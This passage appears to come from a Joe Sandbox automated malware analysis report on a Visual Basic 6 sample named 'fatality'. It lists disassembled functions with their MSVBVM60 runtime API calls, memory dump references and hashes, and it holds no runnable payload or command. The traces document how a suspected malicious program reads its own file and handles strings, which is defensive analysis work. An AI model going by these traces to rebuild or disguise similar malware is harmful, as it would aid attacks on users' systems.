                                                                                                                                                            • __vbaStrCopy.MSVBVM60(6CEBD9F5,00000000,6CEBD83C), ref: 00415DA5
                                                                                                                                                            • __vbaStrCopy.MSVBVM60 ref: 00415DAD
                                                                                                                                                            • __vbaOnError.MSVBVM60(00000001), ref: 00415DB1
                                                                                                                                                            • __vbaStrToAnsi.MSVBVM60(?,?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 00415DD0
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(00000000), ref: 00415DE1
                                                                                                                                                            • __vbaStrToUnicode.MSVBVM60(?,?), ref: 00415DEB
                                                                                                                                                            • __vbaFreeStr.MSVBVM60 ref: 00415DFA
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(?,00000000,?,00000000,?), ref: 00415E2D
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(?,?,00000006,?,00000000), ref: 00415E43
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(?,?,00000010,?,00000000), ref: 00415E59
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(?,?,?,00000000), ref: 00415E70
                                                                                                                                                            • __vbaRedim.MSVBVM60(00000080,00000001,?,00000011,00000001,?,00000000), ref: 00415E86
                                                                                                                                                            • __vbaAryLock.MSVBVM60(?,?), ref: 00415E97
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60 ref: 00415EB4
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60 ref: 00415EC3
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(?,3F800000,?,?,00000000), ref: 00415EE4
                                                                                                                                                            • __vbaAryUnlock.MSVBVM60(?), ref: 00415EEA
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(?), ref: 00415EF9
                                                                                                                                                            • __vbaStrToAnsi.MSVBVM60(?,?,C0000000,00000000,00000000,00000003,00000000,00000000), ref: 00415F0E
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(00000000), ref: 00415F19
                                                                                                                                                            • __vbaStrToUnicode.MSVBVM60(?,?), ref: 00415F23
                                                                                                                                                            • __vbaFreeStr.MSVBVM60 ref: 00415F32
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60(?,?,?,?,?), ref: 00415F98
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60(?,?,?,?,?), ref: 00415FAB
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(?,?,?,00000000), ref: 00415FCA
                                                                                                                                                            • __vbaAryLock.MSVBVM60(?,?), ref: 00415FD4
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60 ref: 00415FF1
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60 ref: 00415FF9
                                                                                                                                                            • __vbaUbound.MSVBVM60(00000001,?,?,00000000), ref: 0041600D
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(?,3F800000,00000000), ref: 00416026
                                                                                                                                                            • __vbaAryUnlock.MSVBVM60(?), ref: 00416032
                                                                                                                                                            • __vbaAryLock.MSVBVM60(?,?), ref: 0041603C
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60 ref: 0041605C
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60 ref: 0041606D
                                                                                                                                                            • __vbaAryUnlock.MSVBVM60(?,?,?,3F800004,?), ref: 00416095
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(?), ref: 004160A5
                                                                                                                                                            • __vbaExitProc.MSVBVM60 ref: 004160AE
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(?,?), ref: 004160D0
                                                                                                                                                            • __vbaExitProc.MSVBVM60 ref: 004160D9
                                                                                                                                                            • __vbaFreeStr.MSVBVM60(00416126), ref: 00416103
                                                                                                                                                            • __vbaRecDestruct.MSVBVM60(00406C9C,?), ref: 0041610E
                                                                                                                                                            • __vbaAryDestruct.MSVBVM60(00000000,?), ref: 0041611A
                                                                                                                                                            • __vbaFreeStr.MSVBVM60 ref: 00416123
                                                                                                                                                              • Part of subcall function 00416140: __vbaSetSystemError.MSVBVM60(00000000,?,00000006,?,00000000,?,00415E12,?), ref: 00416174
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.1707601701.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.1707527529.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1707561650.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1707711047.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1707870858.000000000041D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fatality.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __vba$Error$System$BoundsGenerate$Free$LockUnlock$AnsiCopyDestructExitProcUnicode$RedimUbound
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2812220623-0
                                                                                                                                                            • Opcode ID: 57e9575da3c81f2ccb810852609170278bbd2706e9235e0bb030ce107236565a
                                                                                                                                                            • Instruction ID: e990e7f7e1d036554655f0c5b60a984b82b92affe55a7b322dae047d0808a029
                                                                                                                                                            • Opcode Fuzzy Hash: 57e9575da3c81f2ccb810852609170278bbd2706e9235e0bb030ce107236565a
                                                                                                                                                            • Instruction Fuzzy Hash: 40D11B71D00208ABCB04DFE5DD84DEEBBB9FF88700F14851AF506AB254DB75A986CB64
                                                                                                                                                            Function 004128B0 Relevance: 61.7, APIs: 41, Instructions: 214COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • __vbaChkstk.MSVBVM60(00000000,004025E6,?,?,?,?,00000000,004025E6), ref: 004128CE
                                                                                                                                                            • __vbaStrCopy.MSVBVM60(?,00000000,?,00000000,004025E6), ref: 004128FB
                                                                                                                                                            • __vbaOnError.MSVBVM60(000000FF,?,00000000,?,00000000,004025E6), ref: 0041290A
                                                                                                                                                            • #648.MSVBVM60(0000000A), ref: 00412929
                                                                                                                                                            • __vbaFreeVar.MSVBVM60 ref: 00412938
                                                                                                                                                            • __vbaI2I4.MSVBVM60(?), ref: 0041294C
                                                                                                                                                            • __vbaFileOpen.MSVBVM60(00000120,000000FF,00000000), ref: 0041295A
                                                                                                                                                            • __vbaI2I4.MSVBVM60 ref: 0041296A
                                                                                                                                                            • #570.MSVBVM60(00000000), ref: 00412971
                                                                                                                                                            • __vbaLenBstr.MSVBVM60(00404B24), ref: 0041297E
                                                                                                                                                            • __vbaI2I4.MSVBVM60 ref: 004129B3
                                                                                                                                                            • __vbaFileSeek.MSVBVM60(00000000,00000000), ref: 004129BE
                                                                                                                                                            • __vbaI2I4.MSVBVM60 ref: 004129CE
                                                                                                                                                            • __vbaGet3.MSVBVM60(00000004,?,00000000), ref: 004129DB
                                                                                                                                                            • __vbaLenBstr.MSVBVM60(00404B24), ref: 004129F9
                                                                                                                                                            • __vbaLenBstr.MSVBVM60(00404B24), ref: 00412A27
                                                                                                                                                            • #525.MSVBVM60(00000000), ref: 00412A2E
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 00412A39
                                                                                                                                                            • __vbaI2I4.MSVBVM60 ref: 00412A49
                                                                                                                                                            • __vbaFileSeek.MSVBVM60(00000000,00000000), ref: 00412A54
                                                                                                                                                            • __vbaI2I4.MSVBVM60 ref: 00412A64
                                                                                                                                                            • __vbaGet3.MSVBVM60(00000000,?,00000000), ref: 00412A71
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaLenBstr.MSVBVM60(00000000), ref: 0040EEAD
                                                                                                                                                              • Part of subcall function 0040EE70: #631.MSVBVM60(?,?,?), ref: 0040EEF8
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,?), ref: 0040EF03
                                                                                                                                                              • Part of subcall function 0040EE70: #516.MSVBVM60(00000000,?,?,?), ref: 0040EF0A
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(?,?,?), ref: 0040EF68
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaFreeVar.MSVBVM60(?,?,?), ref: 0040EF71
                                                                                                                                                              • Part of subcall function 0040EE70: #631.MSVBVM60(?,?,00000002,?,?,?), ref: 0040EFA1
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,?), ref: 0040EFAC
                                                                                                                                                              • Part of subcall function 0040EE70: #516.MSVBVM60(00000000,?,?,00000002,?,?,?), ref: 0040EFB3
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?), ref: 00412A8C
                                                                                                                                                            • __vbaStrCopy.MSVBVM60 ref: 00412AAA
                                                                                                                                                            • __vbaStrMove.MSVBVM60(00000003), ref: 00412ABB
                                                                                                                                                            • #616.MSVBVM60(00000000), ref: 00412AC2
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 00412ACD
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,?), ref: 0040F00F
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaFreeVar.MSVBVM60(?,?,00000002,?,?,?), ref: 0040F018
                                                                                                                                                              • Part of subcall function 0040EE70: #631.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F049
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F054
                                                                                                                                                              • Part of subcall function 0040EE70: #516.MSVBVM60(00000000,?,?,00000002,?,?,00000002,?,?,?), ref: 0040F05B
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F0AF
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaFreeVar.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F0B8
                                                                                                                                                              • Part of subcall function 0040EE70: #537.MSVBVM60(-0000000C,?,?,?,00000002,?,?,00000002,?,?,?), ref: 0040F0F3
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F104
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaStrCat.MSVBVM60(00000000,?,?,00000002,?,?,00000002,?,?,?), ref: 0040F107
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F112
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F117
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,00000000), ref: 00412AE2
                                                                                                                                                            • __vbaStrCmp.MSVBVM60(00000000), ref: 00412AE9
                                                                                                                                                            • __vbaFreeStrList.MSVBVM60(00000005,?,?,?,?,00000000), ref: 00412B10
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaStrCopy.MSVBVM60 ref: 0040F13C
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(0040F175), ref: 0040F16E
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,?,?,00000000), ref: 00412B36
                                                                                                                                                            • __vbaStrMove.MSVBVM60(00000004), ref: 00412B57
                                                                                                                                                            • #618.MSVBVM60(00000000), ref: 00412B5E
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 00412B69
                                                                                                                                                            • __vbaI4Str.MSVBVM60(00000000), ref: 00412B70
                                                                                                                                                            • __vbaFreeStrList.MSVBVM60(00000003,?,?,00000000), ref: 00412B87
                                                                                                                                                            • __vbaI2I4.MSVBVM60(?,?,?,?,?,?,00000000), ref: 00412B9A
                                                                                                                                                            • __vbaFileClose.MSVBVM60(00000000), ref: 00412BA1
                                                                                                                                                            • __vbaFreeStr.MSVBVM60(00412BEA), ref: 00412BDA
                                                                                                                                                            • __vbaFreeStr.MSVBVM60(?,?,?,?,?,?,00000000), ref: 00412BE3
                                                                                                                                                            • __vbaErrorOverflow.MSVBVM60 ref: 00412C00
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.1707601701.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.1707527529.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1707561650.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1707711047.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1707870858.000000000041D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fatality.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __vba$FreeMove$BstrFile$#516#631Copy$ErrorGet3ListSeek$#525#537#570#616#618#648ChkstkCloseOpenOverflow
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 277344030-0
                                                                                                                                                            • Opcode ID: 4fdbd1f00878914f35780159ae431110eecd2a164aeb5ddbb8388ccc6ffa626b
                                                                                                                                                            • Instruction ID: f355006ae09e1e352358bc31eb7e3acedda410367e126062bc5f553c60d2b707
                                                                                                                                                            • Opcode Fuzzy Hash: 4fdbd1f00878914f35780159ae431110eecd2a164aeb5ddbb8388ccc6ffa626b
                                                                                                                                                            • Instruction Fuzzy Hash: D891C8B1D00208EFDB04DFE4DE58BDEBBB4BB48305F208169E612B76A0DB745A45CB58
                                                                                                                                                            Function 0040EAB0 Relevance: 54.5, APIs: 29, Strings: 2, Instructions: 255COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • #594.MSVBVM60(?,6CEBD9F5,-00000001,6CEBD8B1), ref: 0040EB1A
                                                                                                                                                            • __vbaFreeVar.MSVBVM60 ref: 0040EB23
                                                                                                                                                            • __vbaLenBstr.MSVBVM60 ref: 0040EB2F
                                                                                                                                                            • #631.MSVBVM60(?,?,0000000A), ref: 0040EB68
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,?,0000000A), ref: 0040EB73
                                                                                                                                                            • #516.MSVBVM60(00000000,?,?,0000000A), ref: 0040EB7A
                                                                                                                                                            • __vbaFreeStr.MSVBVM60(?,?,0000000A), ref: 0040EB89
                                                                                                                                                            • __vbaFreeVar.MSVBVM60(?,?,0000000A), ref: 0040EB92
                                                                                                                                                            • #593.MSVBVM60(00000002,?,?,?,?,0000000A), ref: 0040EC76
                                                                                                                                                            • #714.MSVBVM60(?,00000004,00000000,?,?,?,0000000A), ref: 0040ED04
                                                                                                                                                            • __vbaVarAdd.MSVBVM60(?,?,00000003,?,?,0000000A), ref: 0040ED1C
                                                                                                                                                            • __vbaI4Var.MSVBVM60(00000000,?,?,0000000A), ref: 0040ED23
                                                                                                                                                            • __vbaFreeVarList.MSVBVM60(00000004,00000002,00000004,?,?,?,?,0000000A), ref: 0040ED40
                                                                                                                                                            • #537.MSVBVM60(?,?), ref: 0040ED54
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,?), ref: 0040ED65
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00000000,?,?), ref: 0040ED68
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,?), ref: 0040ED73
                                                                                                                                                            • #537.MSVBVM60(?,00000000,?,?), ref: 0040ED77
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,00000000,?,?), ref: 0040ED82
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00000000,?,00000000,?,?), ref: 0040ED8B
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,00000000,?,?), ref: 0040ED92
                                                                                                                                                            • #537.MSVBVM60(00000000,00000000,?,00000000,?,?), ref: 0040ED96
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,00000000,?,?), ref: 0040EDA1
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00000000,?,00000000,?,?), ref: 0040EDA4
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,00000000,?,?), ref: 0040EDAB
                                                                                                                                                            • __vbaFreeStrList.MSVBVM60(00000005,?,?,?,?,?,?,00000000,?,?), ref: 0040EDC3
                                                                                                                                                            • __vbaStrCopy.MSVBVM60 ref: 0040EDEC
                                                                                                                                                            • __vbaFreeStr.MSVBVM60(0040EE4E), ref: 0040EE47
                                                                                                                                                            • __vbaErrorOverflow.MSVBVM60(?,?,0000000A), ref: 0040EE69
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.1707601701.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.1707527529.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1707561650.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1707711047.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1707870858.000000000041D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fatality.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __vba$Move$Free$#537$List$#516#593#594#631#714BstrCopyErrorOverflow
                                                                                                                                                            • String ID: gfff$gfff
                                                                                                                                                            • API String ID: 2397813863-3084402119
                                                                                                                                                            • Opcode ID: 1859efc3a836bc8348b47109d9ac22472ae7e224be2a5a0a1c78bdaa5bd21b43
                                                                                                                                                            • Instruction ID: 69a6bd49322be43a13479f126592eb8a048afae0e7896bfb7d302a94b416162a
                                                                                                                                                            • Opcode Fuzzy Hash: 1859efc3a836bc8348b47109d9ac22472ae7e224be2a5a0a1c78bdaa5bd21b43
                                                                                                                                                            • Instruction Fuzzy Hash: CD9141B5E00208DBCB08DFB5DD89ADDBBBAEB88341F14453AE505F72A0DB345985CB94
                                                                                                                                                            Function 00410780 Relevance: 52.7, APIs: 35, Instructions: 227COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • __vbaChkstk.MSVBVM60(00000000,004025E6,?,?,?,?,004093D0,00000000), ref: 0041079E
                                                                                                                                                            • __vbaStrCopy.MSVBVM60(?,?,?,00000000,004025E6), ref: 004107CE
                                                                                                                                                            • __vbaAryConstruct2.MSVBVM60(?,004068A0,00000003,?,?,?,00000000,004025E6), ref: 004107DF
                                                                                                                                                            • __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004025E6), ref: 004107EE
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(0000000F,00000000,?,?,?,00000000,004025E6), ref: 0041080A
                                                                                                                                                            • __vbaRecUniToAnsi.MSVBVM60(00404B50,?,00000128), ref: 00410844
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(?,00000000), ref: 0041085A
                                                                                                                                                            • __vbaRecAnsiToUni.MSVBVM60(00404B50,00000128,?), ref: 00410873
                                                                                                                                                            • #525.MSVBVM60(00000104), ref: 0041089C
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 004108A7
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(00000410,00000000,?), ref: 004108DE
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60 ref: 0041091D
                                                                                                                                                            • __vbaStrToAnsi.MSVBVM60(?,?,000001F4), ref: 00410938
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(?,?,00000000), ref: 0041095E
                                                                                                                                                            • __vbaStrToUnicode.MSVBVM60(?,?,?,00000000), ref: 0041096F
                                                                                                                                                            • __vbaFreeStr.MSVBVM60(?,00000000), ref: 00410984
                                                                                                                                                            • #616.MSVBVM60(?,?,?,00000000), ref: 00410999
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,00000000), ref: 004109A7
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,?,00000000), ref: 004109BE
                                                                                                                                                            • __vbaFreeStr.MSVBVM60(?,00000000), ref: 004109CA
                                                                                                                                                            • #517.MSVBVM60(?,?,00000000), ref: 004109DB
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,00000000), ref: 004109E9
                                                                                                                                                            • #517.MSVBVM60(?,00000000,?,00000000), ref: 004109F7
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,00000000), ref: 00410A05
                                                                                                                                                            • __vbaStrCmp.MSVBVM60(00000000,?,00000000), ref: 00410A0C
                                                                                                                                                            • __vbaFreeStrList.MSVBVM60(00000002,?,?,?,00000000), ref: 00410A30
                                                                                                                                                            • __vbaRecUniToAnsi.MSVBVM60(00404B50,?,?,?,00000000,004025E6), ref: 00410A77
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(?,00000000,?,00000000,004025E6), ref: 00410A8D
                                                                                                                                                            • __vbaRecAnsiToUni.MSVBVM60(00404B50,?,?,?,00000000,004025E6), ref: 00410AA6
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(?), ref: 00410ACA
                                                                                                                                                            • __vbaFreeStr.MSVBVM60(00410B37), ref: 00410B03
                                                                                                                                                            • __vbaAryDestruct.MSVBVM60(00000000,?), ref: 00410B1B
                                                                                                                                                            • __vbaFreeStr.MSVBVM60 ref: 00410B24
                                                                                                                                                            • __vbaFreeStr.MSVBVM60 ref: 00410B30
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.1707601701.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.1707527529.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1707561650.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1707711047.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1707870858.000000000041D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fatality.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __vba$Error$FreeSystem$AnsiMove$#517$#525#616BoundsChkstkConstruct2CopyDestructGenerateListUnicode
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3648932012-0
                                                                                                                                                            • Opcode ID: 87815be6b7c03a5207e36eb47b7e00b3ec7173c49da51aca528be144e1a0b0d3
                                                                                                                                                            • Instruction ID: cf7582b6c84a3ebcd0dc45819e7631e4fb138bd8fd28df0a43539233d5c0ba2c
                                                                                                                                                            • Opcode Fuzzy Hash: 87815be6b7c03a5207e36eb47b7e00b3ec7173c49da51aca528be144e1a0b0d3
                                                                                                                                                            • Instruction Fuzzy Hash: 7FA109B5901219DFDB14DFA0DD48BDEBBB4BF48304F1081AAE50AB72A0DB745A85CF58
                                                                                                                                                            Function 0040C700 Relevance: 48.5, APIs: 32, Instructions: 452COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • __vbaChkstk.MSVBVM60(?,004025E6), ref: 0040C71E
                                                                                                                                                            • __vbaOnError.MSVBVM60(000000FF,?,?,?,?,004025E6), ref: 0040C74E
                                                                                                                                                            • __vbaHresultCheckObj.MSVBVM60(00000000,?,00405414,00000728), ref: 0040C7A1
                                                                                                                                                            • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040563C,0000001C), ref: 0040C7E9
                                                                                                                                                            • __vbaI2I4.MSVBVM60 ref: 0040C80D
                                                                                                                                                            • __vbaFreeObj.MSVBVM60 ref: 0040C81A
                                                                                                                                                            • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040C884
                                                                                                                                                            • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00406C48,0000004C), ref: 0040C8B7
                                                                                                                                                            • __vbaFreeObj.MSVBVM60 ref: 0040C8EF
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.1707601701.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.1707527529.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1707561650.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1707711047.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1707870858.000000000041D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fatality.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __vba$CheckHresult$Free$ChkstkError
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1728155253-0
                                                                                                                                                            • Opcode ID: 57bc03b52b3c873fae243cd4aa70e656bc598bd1710269bbbe43208556864782
                                                                                                                                                            • Instruction ID: 528750ef8f6217dc53c7ee79ba9f07e518e2306c00ab0ecc930209c3b3704f0e
                                                                                                                                                            • Opcode Fuzzy Hash: 57bc03b52b3c873fae243cd4aa70e656bc598bd1710269bbbe43208556864782
                                                                                                                                                            • Instruction Fuzzy Hash: BA1229B5900208EFDB14DFA4C988BDEBBB5FF48700F208269E509B7291D7759985CF64
                                                                                                                                                            Function 0040EE70 Relevance: 47.5, APIs: 24, Strings: 3, Instructions: 230COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • __vbaLenBstr.MSVBVM60(00000000), ref: 0040EEAD
                                                                                                                                                            • #631.MSVBVM60(?,?,?), ref: 0040EEF8
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,?,?), ref: 0040EF03
                                                                                                                                                            • #516.MSVBVM60(00000000,?,?,?), ref: 0040EF0A
                                                                                                                                                            • __vbaFreeStr.MSVBVM60(?,?,?), ref: 0040EF68
                                                                                                                                                            • __vbaFreeVar.MSVBVM60(?,?,?), ref: 0040EF71
                                                                                                                                                            • #631.MSVBVM60(?,?,00000002,?,?,?), ref: 0040EFA1
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,?,00000002,?,?,?), ref: 0040EFAC
                                                                                                                                                            • #516.MSVBVM60(00000000,?,?,00000002,?,?,?), ref: 0040EFB3
                                                                                                                                                            • __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,?), ref: 0040F00F
                                                                                                                                                            • __vbaFreeVar.MSVBVM60(?,?,00000002,?,?,?), ref: 0040F018
                                                                                                                                                            • #631.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F049
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F054
                                                                                                                                                            • #516.MSVBVM60(00000000,?,?,00000002,?,?,00000002,?,?,?), ref: 0040F05B
                                                                                                                                                            • __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F0AF
                                                                                                                                                            • __vbaFreeVar.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F0B8
                                                                                                                                                            • #537.MSVBVM60(-0000000C,?,?,?,00000002,?,?,00000002,?,?,?), ref: 0040F0F3
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F104
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00000000,?,?,00000002,?,?,00000002,?,?,?), ref: 0040F107
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F112
                                                                                                                                                            • __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F117
                                                                                                                                                            • __vbaStrCopy.MSVBVM60 ref: 0040F13C
                                                                                                                                                            • __vbaFreeStr.MSVBVM60(0040F175), ref: 0040F16E
                                                                                                                                                            • __vbaErrorOverflow.MSVBVM60(?), ref: 0040F18B
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.1707601701.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.1707527529.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1707561650.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1707711047.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1707870858.000000000041D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fatality.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __vba$Free$Move$#516#631$#537BstrCopyErrorOverflow
